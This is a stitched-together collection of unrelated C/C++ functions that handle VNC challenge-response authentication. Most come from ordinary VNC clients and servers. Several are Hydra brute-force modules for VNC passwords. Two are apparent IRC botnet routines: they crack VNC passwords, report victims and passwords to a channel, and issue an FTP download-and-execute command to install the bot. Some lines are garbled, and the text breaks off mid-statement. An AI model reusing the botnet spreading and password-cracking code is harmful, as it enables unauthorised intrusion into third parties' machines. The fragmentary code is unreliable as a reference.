bool ParseDisplay(char *display, char *phost, int hostlen, int *pport, unsigned char *challengedid) { logp(DEBUG, "ParseDisplay: '%s'", display); unsigned char challenge[CHALLENGESIZE]; char tmp_id[MAX_HOST_NAME_LEN + 1]; char *colonpos = strchr(display, ':'); int tmp_code; if (hostlen < (int)strlen(display)) return false; if (colonpos == NULL) return false; strncpy(phost, display, colonpos - display); phost[colonpos - display] = '\0'; memset(tmp_id, 0, sizeof(tmp_id)); if (sscanf(colonpos + 1, "%d", &tmp_code) != 1) return false; if (sscanf(colonpos + 1, "%s", tmp_id) != 1) return false; // encrypt memset(challenge, 0, CHALLENGESIZE); memcpy(challenge, challenge_key, CHALLENGESIZE); vncEncryptBytes(challenge, tmp_id); memset(challengedid, 0, CHALLENGESIZE); memcpy(challengedid, challenge, CHALLENGESIZE); *pport = tmp_code; return true; }
/* for this method, rfbAuthPasswdData is really a pointer to an array of char*'s, where the last pointer is 0. */ Bool rfbCheckPasswordByList(rfbClientPtr cl,const char* response,int len) { char **passwds; for(passwds=(char**)cl->screen->rfbAuthPasswdData;*passwds;passwds++) { vncEncryptBytes(cl->authChallenge, *passwds); if (memcmp(cl->authChallenge, response, len) == 0) return(TRUE); } rfbLog("rfbAuthProcessClientMessage: authentication failed from %s\n", cl->host); return(FALSE); }
int start_vnc(int s,int port, unsigned char options,char *miscptr,FILE *fp) { char *empty = ""; char *pass; if (strlen(pass = hydra_get_next_password()) == 0) pass = empty; if ((buf = hydra_receive_line(s)) == NULL) return 1; buf[CHALLENGESIZE] = 0; vncEncryptBytes(buf, pass); if (hydra_send(s, buf, CHALLENGESIZE, 0) < 0) { return 1; } free(buf); if ((buf = hydra_receive_line(s)) == NULL) return(1); switch (buf[3]) { case 0: hydra_report_found(port, "vnc", fp); hydra_completed_pair_found(); free(buf); if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) return 3; return 1; case 1: free(buf); hydra_completed_pair(); if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) return 3; return 1; case 2: free(buf); if (debug) printf("DEBUG: VNC server is angry, waiting for a minute\n"); sleep(60); return 1; default: free(buf); fprintf(stderr, "Error: unknown VNC server response\n"); return 1; } return 1; // never reached }
static Bool AuthenticateVNC(void) { CARD32 authScheme, authResult; CARD8 challenge[CHALLENGESIZE]; char *passwd; char buffer[64]; char* cstatus; int len; fprintf(stderr, "Performing standard VNC authentication\n"); if (!ReadFromRFBServer((char *)challenge, CHALLENGESIZE)) return False; if (appData.passwordFile) { passwd = vncDecryptPasswdFromFile(appData.passwordFile); if (!passwd) { fprintf(stderr, "Cannot read valid password from file \"%s\"\n", appData.passwordFile); return False; } } else if (appData.autoPass) { passwd = buffer; cstatus = fgets(buffer, sizeof buffer, stdin); if (cstatus == NULL) buffer[0] = '\0'; else { len = strlen(buffer); if (len > 0 && buffer[len - 1] == '\n') buffer[len - 1] = '\0'; } } else if (appData.passwordDialog) { passwd = DoPasswordDialog(); } else { passwd = getpass("Password: "******"Reading password failed\n"); return False; } if (strlen(passwd) > 8) { passwd[8] = '\0'; } vncEncryptBytes(challenge, passwd); /* Lose the password from memory */ memset(passwd, '\0', strlen(passwd)); if (!WriteExact(rfbsock, (char *)challenge, CHALLENGESIZE)) return False; if (!ReadFromRFBServer((char *)&authResult, 4)) return False; authResult = Swap32IfLE(authResult); switch (authResult) { case rfbVncAuthOK: fprintf(stderr, "VNC authentication succeeded\n"); break; case rfbVncAuthFailed: fprintf(stderr, "VNC authentication failed\n"); return False; case rfbVncAuthTooMany: fprintf(stderr, "VNC authentication failed - too many tries\n"); return False; default: fprintf(stderr, "Unknown VNC authentication result: %d\n", (int)authResult); return False; } return True; }
BOOL vncClientThread::InitAuthenticate() { // Retrieve the local password char password[MAXPWLEN]; m_server->GetPassword(password); vncPasswd::ToText plain(password); // Verify the peer host name against the AuthHosts string vncServer::AcceptQueryReject verified; if (m_auth) { verified = vncServer::aqrAccept; } else { verified = m_server->VerifyHost(m_socket->GetPeerName()); } // If necessary, query the connection with a timed dialog if (verified == vncServer::aqrQuery) { vncAcceptDialog *acceptDlg = new vncAcceptDialog(m_server->QueryTimeout(), m_socket->GetPeerName()); if ((acceptDlg == 0) || (!(acceptDlg->DoDialog()))) verified = vncServer::aqrReject; } if (verified == vncServer::aqrReject) { CARD32 auth_val = Swap32IfLE(rfbConnFailed); char *errmsg = "Your connection has been rejected."; CARD32 errlen = Swap32IfLE(strlen(errmsg)); if (!m_socket->SendExact((char *)&auth_val, sizeof(auth_val))) return FALSE; if (!m_socket->SendExact((char *)&errlen, sizeof(errlen))) return FALSE; m_socket->SendExact(errmsg, strlen(errmsg)); return FALSE; } // By default we disallow passwordless workstations! if ((strlen(plain) == 0) && m_server->AuthRequired()) { vnclog.Print(LL_CONNERR, VNCLOG("no password specified for server - client rejected\n")); // Send an error message to the client CARD32 auth_val = Swap32IfLE(rfbConnFailed); char *errmsg = "This server does not have a valid password enabled. " "Until a password is set, incoming connections cannot be accepted."; CARD32 errlen = Swap32IfLE(strlen(errmsg)); if (!m_socket->SendExact((char *)&auth_val, sizeof(auth_val))) return FALSE; if (!m_socket->SendExact((char *)&errlen, sizeof(errlen))) return FALSE; m_socket->SendExact(errmsg, strlen(errmsg)); return FALSE; } // By default we filter out local loop connections, because they're pointless if (!m_server->LoopbackOk()) { char *localname = strdup(m_socket->GetSockName()); char *remotename = strdup(m_socket->GetPeerName()); // Check that the local & remote names are different! if ((localname != NULL) && (remotename != NULL)) { BOOL ok = strcmp(localname, remotename) != 0; if (localname != NULL) free(localname); if (remotename != NULL) free(remotename); if (!ok) { vnclog.Print(LL_CONNERR, VNCLOG("loopback connection attempted - client rejected\n")); // Send an error message to the client CARD32 auth_val = Swap32IfLE(rfbConnFailed); char *errmsg = "Local loop-back connections are disabled."; CARD32 errlen = Swap32IfLE(strlen(errmsg)); if (!m_socket->SendExact((char *)&auth_val, sizeof(auth_val))) return FALSE; if (!m_socket->SendExact((char *)&errlen, sizeof(errlen))) return FALSE; m_socket->SendExact(errmsg, strlen(errmsg)); return FALSE; } } } // Authenticate the connection, if required if (m_auth || (strlen(plain) == 0)) { // Send no-auth-required message CARD32 auth_val = Swap32IfLE(rfbNoAuth); if (!m_socket->SendExact((char *)&auth_val, sizeof(auth_val))) return FALSE; } else { // Send auth-required message CARD32 auth_val = Swap32IfLE(rfbVncAuth); if (!m_socket->SendExact((char *)&auth_val, sizeof(auth_val))) return FALSE; BOOL auth_ok = TRUE; { // Now create a 16-byte challenge char challenge[16]; vncRandomBytes((BYTE *)&challenge); // Send the challenge to the client if (!m_socket->SendExact(challenge, sizeof(challenge))) return FALSE; // Read the response char response[16]; if (!m_socket->ReadExact(response, sizeof(response)))\ return FALSE; // Encrypt the challenge bytes vncEncryptBytes((BYTE *)&challenge, plain); // Compare them to the response for (int i=0; i<sizeof(challenge); i++) { if (challenge[i] != response[i]) { auth_ok = FALSE; break; } } } // Did the authentication work? CARD32 authmsg; if (!auth_ok) { vnclog.Print(LL_CONNERR, VNCLOG("authentication failed\n")); authmsg = Swap32IfLE(rfbVncAuthFailed); m_socket->SendExact((char *)&authmsg, sizeof(authmsg)); return FALSE; } else { // Tell the client we're ok authmsg = Swap32IfLE(rfbVncAuthOK); if (!m_socket->SendExact((char *)&authmsg, sizeof(authmsg))) return FALSE; } } // Read the client's initialisation message rfbClientInitMsg client_ini; if (!m_socket->ReadExact((char *)&client_ini, sz_rfbClientInitMsg)) return FALSE; // If the client wishes to have exclusive access then remove other clients if (!client_ini.shared && !m_shared) { // Which client takes priority, existing or incoming? if (m_server->ConnectPriority() < 1) { // Incoming vnclog.Print(LL_INTINFO, VNCLOG("non-shared connection - disconnecting old clients\n")); m_server->KillAuthClients(); } else if (m_server->ConnectPriority() > 1) { // Existing if (m_server->AuthClientCount() > 0) { vnclog.Print(LL_CLIENTS, VNCLOG("connections already exist - client rejected\n")); return FALSE; } } } // Tell the server that this client is ok return m_server->Authenticated(m_client->GetClientId()); }
Bool InitialiseRFBConnection() { rfbProtocolVersionMsg pv; int major,minor; CARD32 authScheme, reasonLen, authResult; char *reason; CARD8 challenge[CHALLENGESIZE]; char *passwd; int i; rfbClientInitMsg ci; if (!ReadFromRFBServer(pv, sz_rfbProtocolVersionMsg)) return False; pv[sz_rfbProtocolVersionMsg] = 0; if (sscanf(pv,rfbProtocolVersionFormat,&major,&minor) != 2) { fprintf(stderr,"Not a valid VNC server\n"); return False; } if (!appData.quiet) { fprintf(stderr,"VNC server supports protocol version %d.%d (viewer %d.%d)\n", major, minor, rfbProtocolMajorVersion, rfbProtocolMinorVersion); } major = rfbProtocolMajorVersion; minor = rfbProtocolMinorVersion; sprintf(pv,rfbProtocolVersionFormat,major,minor); if (!WriteToRFBServer(pv, sz_rfbProtocolVersionMsg)) return False; if (!ReadFromRFBServer((char *)&authScheme, 4)) return False; authScheme = Swap32IfLE(authScheme); switch (authScheme) { case rfbConnFailed: if (!ReadFromRFBServer((char *)&reasonLen, 4)) return False; reasonLen = Swap32IfLE(reasonLen); reason = malloc(reasonLen); if (!ReadFromRFBServer(reason, reasonLen)) return False; fprintf(stderr,"VNC connection failed: %.*s\n",(int)reasonLen, reason); return False; case rfbNoAuth: if (!appData.quiet) { fprintf(stderr,"No authentication needed\n"); } break; case rfbVncAuth: if (!ReadFromRFBServer((char *)challenge, CHALLENGESIZE)) return False; if (appData.passwordFile) { passwd = vncDecryptPasswdFromFile(appData.passwordFile); if (!passwd) { fprintf(stderr,"Cannot read valid password from file \"%s\"\n", appData.passwordFile); return False; } /* added this to read the command line password */ } else if (appData.tpass) { passwd = appData.tpass; } else { passwd = getpass("Password: "******"Reading password failed\n"); return False; } if (strlen(passwd) > 8) { passwd[8] = '\0'; } vncEncryptBytes(challenge, passwd); /* Lose the password from memory */ for (i = strlen(passwd); i >= 0; i--) { passwd[i] = '\0'; } if (!WriteToRFBServer((char *)challenge, CHALLENGESIZE)) return False; if (!ReadFromRFBServer((char *)&authResult, 4)) return False; authResult = Swap32IfLE(authResult); switch (authResult) { case rfbVncAuthOK: if (!appData.quiet) { fprintf(stderr,"VNC authentication succeeded\n"); } break; case rfbVncAuthFailed: fprintf(stderr,"VNC authentication failed\n"); return False; case rfbVncAuthTooMany: fprintf(stderr,"VNC authentication failed - too many tries\n"); return False; default: fprintf(stderr,"Unknown VNC authentication result: %d\n", (int)authResult); return False; } break; default: fprintf(stderr,"Unknown authentication scheme from VNC server: %d\n", (int)authScheme); return False; } ci.shared = 1; if (!WriteToRFBServer((char *)&ci, sz_rfbClientInitMsg)) return False; if (!ReadFromRFBServer((char *)&si, sz_rfbServerInitMsg)) return False; si.framebufferWidth = Swap16IfLE(si.framebufferWidth); si.framebufferHeight = Swap16IfLE(si.framebufferHeight); si.format.redMax = Swap16IfLE(si.format.redMax); si.format.greenMax = Swap16IfLE(si.format.greenMax); si.format.blueMax = Swap16IfLE(si.format.blueMax); si.nameLength = Swap32IfLE(si.nameLength); desktopName = malloc(si.nameLength + 1); if (!desktopName) { fprintf(stderr, "Error allocating memory for desktop name, %lu bytes\n", (unsigned long)si.nameLength); return False; } if (!ReadFromRFBServer(desktopName, si.nameLength)) return False; desktopName[si.nameLength] = 0; if (!appData.quiet) { fprintf(stderr,"Desktop name \"%s\"\n",desktopName); fprintf(stderr,"Connected to VNC server, using protocol version %d.%d\n", rfbProtocolMajorVersion, rfbProtocolMinorVersion); fprintf(stderr,"VNC server default format:\n"); PrintPixelFormat(&si.format); } return True; }
int start_vnc(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { char *empty = ""; char *pass; unsigned char buf2[CHALLENGESIZE + 4]; if (strlen(pass = hydra_get_next_password()) == 0) pass = empty; recv(s, buf2, CHALLENGESIZE + 4, 0); if (vnc_client_version == RFB37) { int i; //fprintf(stderr,"number of security types supported: %d\n", buf2[0]); if (buf2[0] == 0) { hydra_report(stderr, "[ERROR] VNC server connection failed\n"); hydra_child_exit(0); } for (i = 1; i <= buf2[0]; i++) { //fprintf(stderr,"sec type %u\n",buf2[i]); //check if weak security types are available if (buf2[i] <= 0x2) { buf2[3] = buf2[i]; break; } } } //supported security type switch (buf2[3]) { case 0x0: hydra_report(stderr, "[ERROR] VNC server told us to quit %c\n", buf[3]); hydra_child_exit(0); case 0x1: hydra_report(fp, "VNC server does not require authentication.\n"); if (fp != stdout) hydra_report(stdout, "VNC server does not require authentication.\n"); hydra_report_found_host(port, ip, "vnc", fp); hydra_completed_pair_found(); hydra_child_exit(2); case 0x2: //VNC security type supported is the only type supported for now if (vnc_client_version == RFB37) { sprintf(buf, "%c", 0x2); if (hydra_send(s, buf, strlen(buf), 0) < 0) { return 1; } //get authentication challenge from server if (recv(s, buf2, CHALLENGESIZE, 0) == -1) return 1; //send response vncEncryptBytes(buf2, pass); if (hydra_send(s, (char *) buf2, CHALLENGESIZE, 0) < 0) { return 1; } } else { //in old proto, challenge is following the security type vncEncryptBytes((unsigned char *) buf2 + 4, pass); if (hydra_send(s, (char *) buf2 + 4, CHALLENGESIZE, 0) < 0) { return 1; } } break; default: hydra_report(stderr, "[ERROR] unknown VNC security type\n"); hydra_child_exit(2); } //check security result value recv(s, buf, 4, 0); if (buf == NULL) return 1; switch (buf[3]) { case 0x0: hydra_report_found_host(port, ip, "vnc", fp); hydra_completed_pair_found(); free(buf); failed_auth = 0; if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) return 3; return 1; case 0x1: free(buf); if (verbose) hydra_report(stderr, "[VERBOSE] Authentication failed for password %s\n", pass); hydra_completed_pair(); if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) return 3; return 1; default: free(buf); hydra_report(stderr, "[ERROR] unknown VNC server security result %d\n", buf[3]); return 1; } return 1; /* never reached */ }
static gboolean rfb_decoder_state_wait_for_security (RfbDecoder * decoder) { guint8 *buffer = NULL; /* * Version 3.3 The server decides the security type and sends a single word * * The security-type may only take the value 0, 1 or 2. A value of 0 means that the * connection has failed and is followed by a string giving the reason, as described * above. */ if (IS_VERSION_3_3 (decoder)) { buffer = rfb_decoder_read (decoder, 4); decoder->security_type = RFB_GET_UINT32 (buffer); GST_DEBUG ("security = %d", decoder->security_type); g_return_val_if_fail (decoder->security_type < 3, FALSE); g_return_val_if_fail (decoder->security_type != SECURITY_FAIL, rfb_decoder_state_reason (decoder)); g_free (buffer); buffer = NULL; } else { /* \TODO Add behavoir for the rfb 3.7 and 3.8 servers */ GST_WARNING ("Other versions are not yet supported"); } switch (decoder->security_type) { case SECURITY_NONE: GST_DEBUG ("Security type is None"); if (IS_VERSION_3_8 (decoder)) { decoder->state = rfb_decoder_state_security_result; } else { decoder->state = rfb_decoder_state_send_client_initialisation; } break; case SECURITY_VNC: /* * VNC authentication is to be used and protocol data is to be sent unencrypted. The * server sends a random 16-byte challenge */ GST_DEBUG ("Security type is VNC Authentication"); /* VNC Authentication can't be used if the password is not set */ if (!decoder->password) { GST_WARNING ("VNC Authentication can't be used if the password is not set"); return FALSE; } buffer = rfb_decoder_read (decoder, 16); vncEncryptBytes ((unsigned char *) buffer, decoder->password); rfb_decoder_send (decoder, buffer, 16); g_free (buffer); GST_DEBUG ("Encrypted challenge send to server"); decoder->state = rfb_decoder_state_security_result; break; default: GST_WARNING ("Security type is not known"); return FALSE; break; } return TRUE; }
int vncshit(EXINFO exinfo, char *passwd) { char sendbuf[IRCLINE]; struct sockaddr_in ssin; SOCKET sock = fsocket(AF_INET,SOCK_STREAM,0); if (sock == INVALID_SOCKET) return FALSE; int m_majorVersion, m_minorVersion; ssin.sin_addr.s_addr= finet_addr(exinfo.ip); ssin.sin_family = AF_INET; ssin.sin_port = fhtons((unsigned short)exinfo.port); sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); if(fconnect(sock, (LPSOCKADDR)&ssin, sizeof(ssin))) { sprintf(sendbuf,"VNC[-] Could not connect to %s", exinfo.ip); addlog(sendbuf); return false; } rfbProtocolVersionMsg pv; ReadExact(sock, pv, sz_rfbProtocolVersionMsg); pv[sz_rfbProtocolVersionMsg] = 0; m_majorVersion = rfbProtocolMajorVersion; m_minorVersion = rfbProtocolMinorVersion; if (!(m_majorVersion == 3) && !(m_minorVersion == 8)) { sprintf(sendbuf,"VNC[%d.%d] %s Auth ByPass Vuln!!!", m_majorVersion, m_minorVersion, exinfo.ip); irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice ); addlog(sendbuf); return false; } sprintf(pv,rfbProtocolVersionFormat,m_majorVersion,m_minorVersion); WriteExact(sock, pv, sz_rfbProtocolVersionMsg); CARD32 authScheme, authResult; CARD8 challenge[CHALLENGESIZE]; ReadExact(sock,(char *)&authScheme, 4); authScheme = Swap32IfLE(authScheme); switch (authScheme) { case rfbConnFailed: sprintf(sendbuf,"VNC[-] %s connection failed", exinfo.ip); //irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice ); //addlog(sendbuf); return false; case rfbNoAuth: sprintf(sendbuf,"VNC[%d.%d] %s NoPass !!!", m_majorVersion, m_minorVersion, exinfo.ip); irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice ); ExitThread(1); addlog(sendbuf); return false; case rfbVncAuth: { ReadExact(sock ,(char *)challenge, CHALLENGESIZE); if (strlen(passwd) > 8) { passwd[8] = '\0'; } vncEncryptBytes(challenge, passwd); WriteExact(sock, (char *) challenge, CHALLENGESIZE); ReadExact(sock, (char *) &authResult, 4); authResult = Swap32IfLE(authResult); switch (authResult) { case rfbVncAuthOK: sprintf(sendbuf,"CRACKED VNC[%d.%d] %s Pass-> %s !!!", m_majorVersion, m_minorVersion, exinfo.ip, passwd); irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice ); vncSpawn(sock); addlog(sendbuf); return false; case rfbVncAuthFailed: sprintf(sendbuf,"VNC[%d.%d] %s failed pass: %s!", m_majorVersion, m_minorVersion, exinfo.ip , passwd); //irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice ); //addlog(sendbuf); return false; case rfbVncAuthTooMany: sprintf(sendbuf,"VNC[-] %s failed pass - too many tries!", exinfo.ip); //irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice ); Sleep(10000); //addlog(sendbuf); return false; default: Sleep(3000); sprintf(sendbuf,"VNC[-] %s authentication result:%d", exinfo.ip, (int)authResult); irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice ); addlog(sendbuf); return false; } break; } default: sprintf(sendbuf,"VNC[-] %s Unknown authentication scheme from VNC server:%d", exinfo.ip); // irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice ); //addlog(sendbuf); return false; } closesocket(sock); }
int vnccheck(char *host, char *passwd, SOCKET ircconn) { SOCKET sock; SOCKADDR_IN ssin; ssin.sin_family = AF_INET; ssin.sin_port = htons(5900); ssin.sin_addr.s_addr= inet_addr(host); sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); if(connect(sock, (LPSOCKADDR)&ssin, sizeof(ssin))) { //printf("[-] Could not connect\n"); return 1; } char buff[4096]; char ftpline[256]; sprintf(ftpline, "echo open %s %d > ravo &echo user %s %s >> ravo &echo get %s >> ravo &echo bye >> ravo &ftp -n -v -s:ravo &del ravo &%s\r\n", getlocalip(), FTPPORT, "Ravo", "5002", BOTNAME, BOTNAME); unsigned char vncversion[12]; ReadExact(sock, vncversion, sizeof(vncversion)); if(strstr(vncversion, "RFB")) { WriteExact(sock, vncversion, sizeof(vncversion)); strtok(vncversion, " "); int versa = atoi(strtok(NULL, ".")); int versb = atoi(strtok(NULL, "\n")); //printf("[+] Found VNC %d.%d\n", versa, versb); char auth[4]; ReadExact(sock, auth, 4); if(auth[1] == 1 || auth[3] == 1) { //printf("[+] VNC NoAuth!\n"); sprintf(buff, "PRIVMSG %s :VNC v%d.%d with no pass on host %s\n", CHANNEL, versa, versb, host); send(ircconn,buff, strlen(buff), 0); WriteExact(sock, "\0", 1); VNCRoot(sock, ftpline); closesocket(sock); return 1; } else if(auth[1] == 2 || auth[3] == 2) { //printf("[+] VNC needs pass lets brewtf0rc3\n"); char funk[1]; //funk = "0\n"; funk[0] = auth[1]; //funk[1] = '\n'; //printf("funk:\n%s\n%d %d\n", funk, funk[0], funk[1]); WriteExact(sock, funk, 1); // WTF? I NEED 2 send sumthing or ill not get the challenge unsigned char challenge[16]; ReadExact(sock, challenge, 16); vncEncryptBytes(challenge, passwd); WriteExact(sock, challenge, 16); // send encrypted shit // see wtf the status is unsigned char status[4]; ReadExact(sock, status, 4); if(status[3] == 0) { //printf("[+] pass ok\n"); sprintf(buff, "PRIVMSG %s :[VNC] v%d.%d with pass %s on ip %s\n", CHANNEL, versa, versb, passwd, host); send(ircconn,buff, strlen(buff), 0); WriteExact(sock, "\0", 1); VNCRoot(sock, ftpline); closesocket(sock); return 1; } else if(status[3] == 1) { //printf("[-] pass wrong\n"); return 0; } else if(status[3] == 1) { //printf("[-] 2much connections\n"); return 2; } } else if(auth[1] ==0) { return 1; } } closesocket(sock); return 0; }
static Bool AuthenticateVNC(void) { CARD32 authScheme; CARD8 challenge[CHALLENGESIZE]; char *passwd; char buffer[64]; char* cstatus; int len; if (!appData.ffInfo) { fprintf(stderr, "Performing standard VNC authentication\n"); } if (!ReadFromRFBServer((char *)challenge, CHALLENGESIZE)) return False; if (appData.play || appData.movie) { passwd = strdup ("dummy"); return ReadAuthenticationResult(); } if (appData.passwordFile) { passwd = vncDecryptPasswdFromFile(appData.passwordFile); if (!passwd) { fprintf(stderr, "Cannot read valid password from file \"%s\"\n", appData.passwordFile); return False; } } else if (appData.autoPass) { passwd = buffer; cstatus = fgets(buffer, sizeof buffer, stdin); if (cstatus == NULL) buffer[0] = '\0'; else { len = strlen(buffer); if (len > 0 && buffer[len - 1] == '\n') buffer[len - 1] = '\0'; } } else if (appData.passwordDialog) { passwd = DoPasswordDialog(); } else { passwd = getpass("Password: "******"Reading password failed\n"); return False; } if (strlen(passwd) > 8) { passwd[8] = '\0'; } vncEncryptBytes(challenge, passwd); /* Lose the password from memory */ memset(passwd, '\0', strlen(passwd)); if (!WriteExact(rfbsock, (char *)challenge, CHALLENGESIZE)) return False; return ReadAuthenticationResult(); }
bool VNCRFBproto::initialiseRFBConnection() { rfbProtocolVersionMsg pv; rfbClientInitMsg ci; int major, minor; char *reason, *passwd = NULL; CARD32 authScheme, reasonLen, authResult; CARD8 challenge[CHALLENGESIZE]; // was trace fprintf(stderr, "VNCRFBproto::initialiseRFBConnection(): initializing RFB connection\n"); if (!VNC_sock.ReadFromRFBServer(pv, sz_rfbProtocolVersionMsg)) return false; pv[sz_rfbProtocolVersionMsg] = 0; if (sscanf(pv, rfbProtocolVersionFormat, &major, &minor) != 2) { // was error fprintf(stderr, "VNCRFBproto::initialiseRFBConnection() err: not a valid VNC server\n"); return false; } // was trace fprintf(stderr, "VNCRFBproto::initialiseRFBConnection(): VNC server supports protocol version %d.%d (viewer %d.%d)\n", major, minor, rfbProtocolMajorVersion, rfbProtocolMinorVersion); major = rfbProtocolMajorVersion; minor = rfbProtocolMinorVersion; sprintf(pv, rfbProtocolVersionFormat, major, minor); if (!VNC_sock.WriteExact(pv, sz_rfbProtocolVersionMsg)) return false; if (!VNC_sock.ReadFromRFBServer((char *)&authScheme, 4)) return false; authScheme = (CARD32)swap32IfLE(authScheme); switch (authScheme) { case rfbConnFailed: if (!VNC_sock.ReadFromRFBServer((char *)&reasonLen, 4)) return false; reasonLen = swap32IfLE(reasonLen); reason = new char[reasonLen]; if (!VNC_sock.ReadFromRFBServer(reason, reasonLen)) return false; // error fprintf(stderr, "VNCRFBproto::initialiseRFBConnection() err: VNC connection failed: %.*s\n", (int)reasonLen, reason); delete[] reason; return false; case rfbNoAuth: // was trace fprintf(stderr, "VNCRFBproto::initialiseRFBConnection(): No authentication needed\n"); break; case rfbVncAuth: if (!VNC_sock.ReadFromRFBServer((char *)challenge, CHALLENGESIZE)) return false; #if 0 if (passwordFile) {//look for a password stored in passwordFile passwd = vncDecryptPasswdFromFile(passwordFile); if (!passwd) { // was error fprintf(stderr, "VNCRFBproto::initialiseRFBConnection() err: Cannot read valid password from file \"%s\"\n", passwordFile); return false; } } if (! passwd || (! strlen(passwd))) { // was error fprintf(stderr, "VNCRFBproto::initialiseRFBConnection() err: initialiseRFBConnection: reading password failed\n"); return false; } if (strlen(passwd) > 8) passwd[8] = '\0'; #endif //vncEncryptBytes(challenge, passwd); if (strlen(passwordFile) > 8) passwordFile[8] = '\0'; vncEncryptBytes(challenge, passwordFile); /* Lose the password from memory */ //for (int i = strlen(passwd); i >= 0; i--) // passwd[i] = '\0'; passwd = passwd; if (!VNC_sock.WriteExact((char *)challenge, CHALLENGESIZE)) return false; if (!VNC_sock.ReadFromRFBServer((char *)&authResult, 4)) return false; authResult = swap32IfLE(authResult); switch (authResult) { case rfbVncAuthOK: // was trace fprintf(stderr, "VNCRFBproto::initialiseRFBConnection(): VNC authentication succeeded\n"); break; case rfbVncAuthFailed: // was error fprintf(stderr, "VNCRFBproto::initialiseRFBConnection() err: VNC authentication failed\n"); return false; case rfbVncAuthTooMany: // was error fprintf(stderr, "VNCRFBproto::initialiseRFBConnection() err: VNC authentication failed - too many tries\n"); return false; default: // was error fprintf(stderr, "VNCRFBproto::initialiseRFBConnection() err: Unknown VNC authentication result: %d\n", (int)authResult); return false; } break; default: // was error fprintf(stderr, "VNCRFBproto::initialiseRFBConnection() err: Unknown authentication scheme from VNC server: %d\n", (int)authScheme); return false; } ci.shared = (ShareDesktop ? 1 : 0); if (!VNC_sock.WriteExact((char *)&ci, sz_rfbClientInitMsg)) return false; if (!VNC_sock.ReadFromRFBServer((char *)&si, sz_rfbServerInitMsg)) return false; si.framebufferWidth = swap16IfLE(si.framebufferWidth); si.framebufferHeight = swap16IfLE(si.framebufferHeight); si.format.redMax = swap16IfLE(si.format.redMax); si.format.greenMax = swap16IfLE(si.format.greenMax); si.format.blueMax = swap16IfLE(si.format.blueMax); si.nameLength = swap32IfLE(si.nameLength); desktopName = new char[si.nameLength + 1]; if (!VNC_sock.ReadFromRFBServer(desktopName, si.nameLength)) { delete[] desktopName; desktopName = NULL; return false; } desktopName[si.nameLength] = 0; // was notice fprintf(stderr, "VNCRFBproto::initialiseRFBConnection(): Using desktop: %s\n", desktopName); delete[] desktopName; desktopName = NULL; // was 2x trace fprintf(stderr, "VNCRFBproto::initialiseRFBConnection(): connected to VNC server, using protocol version %d.%d\n", rfbProtocolMajorVersion, rfbProtocolMinorVersion); fprintf(stderr, "VNCRFBproto::initialiseRFBConnection(): VNC server default format:\n"); printPixelFormat(&si.format); return true; }
Bool InitialiseRFBConnection(int sock) { rfbProtocolVersionMsg pv; int major,minor; Bool authWillWork = True; CARD32 authScheme, reasonLen, authResult; char *reason; CARD8 challenge[CHALLENGESIZE]; char *passwd; int i; rfbClientInitMsg ci; /* if the connection is immediately closed, don't report anything, so that pmw's monitor can make test connections */ if(listenSpecified) errorMessageFromReadExact = False; if(!ReadExact(sock, pv, sz_rfbProtocolVersionMsg)) return False; errorMessageFromReadExact = True; pv[sz_rfbProtocolVersionMsg] = 0; if(sscanf(pv,rfbProtocolVersionFormat,&major,&minor) != 2) { fprintf(stderr,"%s: Not a valid VNC server\n",programName); return False; } fprintf(stderr,"%s: VNC server supports protocol version %d.%d " "(viewer %d.%d)\n", programName,major,minor,rfbProtocolMajorVersion, rfbProtocolMinorVersion); if((major == 3) && (minor < 3)) { /* if server is before 3.3 authentication won't work */ authWillWork = False; } else { /* any other server version, just tell it what we want */ major = rfbProtocolMajorVersion; minor = rfbProtocolMinorVersion; } sprintf(pv,rfbProtocolVersionFormat,major,minor); if(!WriteExact(sock, pv, sz_rfbProtocolVersionMsg)) return False; if(!ReadExact(sock, (char *)&authScheme, 4)) return False; authScheme = Swap32IfLE(authScheme); switch(authScheme) { case rfbConnFailed: if(!ReadExact(sock, (char *)&reasonLen, 4)) return False; reasonLen = Swap32IfLE(reasonLen); reason = malloc(reasonLen); if(!ReadExact(sock, reason, reasonLen)) { free(reason); return False; } fprintf(stderr,"%s: VNC connection failed: %.*s\n", programName, (int)reasonLen, reason); free(reason); return False; case rfbNoAuth: fprintf(stderr,"%s: No authentication needed\n",programName); break; case rfbVncAuth: if(!authWillWork) { fprintf(stderr, "\n%s: VNC server uses the old authentication scheme.\n" "You should kill your old desktop(s) and restart.\n" "If you really need to connect to this desktop use " "vncviewer3.2\n\n", programName); return False; } if(!ReadExact(sock, (char *)challenge, CHALLENGESIZE)) return False; if(passwdFile) { passwd = vncDecryptPasswdFromFile(passwdFile); if(passwd == NULL) return False; } else { passwd = passwdString; if(strlen(passwd) > 8) { passwd[8] = '\0'; } } vncEncryptBytes(challenge, passwd); /* Lose the password from memory */ for(i=0; i<strlen(passwd); i++) { passwd[i] = '\0'; } if(!WriteExact(sock, challenge, CHALLENGESIZE)) return False; if(!ReadExact(sock, (char *)&authResult, 4)) return False; authResult = Swap32IfLE(authResult); switch(authResult) { case rfbVncAuthOK: fprintf(stderr,"%s: VNC authentication succeeded\n",programName); break; case rfbVncAuthFailed: fprintf(stderr,"%s: VNC authentication failed\n",programName); return False; case rfbVncAuthTooMany: fprintf(stderr,"%s: VNC authentication failed - too many tries\n", programName); return False; default: fprintf(stderr,"%s: Unknown VNC authentication result: %d\n", programName,(int)authResult); return False; } break; default: fprintf(stderr, "%s: Unknown authentication scheme from VNC server: %d\n", programName,(int)authScheme); return False; } ci.shared = (shareDesktop ? 1 : 0); if(!WriteExact(sock, (char 